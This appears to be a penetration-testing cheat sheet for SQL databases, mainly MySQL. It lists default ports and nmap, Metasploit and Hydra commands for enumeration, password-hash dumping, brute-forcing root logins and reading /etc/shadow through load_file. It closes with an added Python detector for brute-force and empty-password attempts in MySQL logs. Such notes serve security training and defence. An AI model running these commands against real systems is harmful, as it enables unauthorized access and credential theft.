SQL

Structured Query Language (SQL) is a standardized programming language that is used to manage relational databases and perform various operations on the data in them.

Relational databases default ports

| Database | Port(s) |
| --- | --- |
| MaxDB | 7210 |
| MySQL | 3306 |
| Oracle DB | 1521, 1830 |
| PostgreSQL | 5432 |
| SQL Server (MSSQL) | 1433, 1434 |

NoSQL databases and other data stores default ports

| Database | Port(s) |
| --- | --- |
| Cassandra | 7000, 7001, 9042 |
| CouchDB | 5984 |
| Elasticsearch | 9200, 9300 |
| MongoDB | 27017, 27018, 27019, 28017 |
| Neo4J | 7473, 7474 |
| Redis | 6379 |

Enum

# Default scan
nmap $IP -sV -p 3306 

# Empty password script
nmap $IP -sV -p 3306 --script=mysql-empty-password

# Get Mysql info
nmap $IP -sV -p 3306 --script=mysql-info

# Get mysql users
nmap $IP -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"

# Get mysql databases
nmap $IP -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"

# Get mysql variables
nmap $IP -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"

# mysql audit
nmap $IP -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"

# Try to connect directly without a password
mysql -h $IP -u root

# Run query
nmap $IP -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',mysqluser='root',mysqlpass=''"

# Metasploit way
msfconsole
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts $IP
set verbose false
run

## Hashdump
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump 
setg rhosts $IP
set username root
set password ""
run

Manipulate local files via db

# connect to instance
mysql -h $IP -u root

# read local file
select load_file("/etc/shadow");

Bruteforce

# Metasploit way
msfconsole
use auxiliary/scanner/mysql/mysql_login
setg rhosts $IP
set verbose false
set stop_on_success true
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set username root
run

# Hydra
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $IP mysql
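
The empty-password checks and password guessing above leave "Access denied" entries on the server side. The following is an added example, not part of the original page: a detector that flags source hosts with a burst of denied logins and accounts probed with no password. It assumes the server writes these notes to its error log; the log lines, function name, and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in MySQL error-log style (not taken from the page).
SAMPLE_LOG = """\
2024-05-01T10:00:00.100000Z 11 [Note] Access denied for user 'root'@'10.0.0.5' (using password: NO)
2024-05-01T10:00:01.200000Z 12 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-05-01T10:00:02.300000Z 13 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-05-01T10:00:03.400000Z 14 [Note] Access denied for user 'root'@'10.0.0.5' (using password: YES)
2024-05-01T10:05:00.000000Z 15 [Note] Access denied for user 'app'@'10.0.0.9' (using password: YES)
2024-05-01T11:30:00.000000Z 16 [Note] Access denied for user 'app'@'10.0.0.9' (using password: YES)
"""

DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d)\.\d+Z .*"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)' "
    r"\(using password: (?P<pw>YES|NO)\)"
)

def analyze(log_text, threshold=3, window=timedelta(seconds=60)):
    """Return (brute_force_hosts, empty_password_probes) from error-log text."""
    failures = defaultdict(list)   # source host -> timestamps of denied logins
    probes = set()                 # (user, host) pairs tried with no password
    for line in log_text.splitlines():
        m = DENIED.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
        failures[m["host"]].append(ts)
        if m["pw"] == "NO":
            probes.add((m["user"], m["host"]))
    flagged = set()
    for host, stamps in failures.items():
        stamps.sort()
        start = 0
        # Sliding window: flag a host with >= threshold failures inside `window`.
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(host)
                break
    return sorted(flagged), sorted(probes)

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

Tune `threshold` and `window` to the normal failure rate of the applications that connect to the instance.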
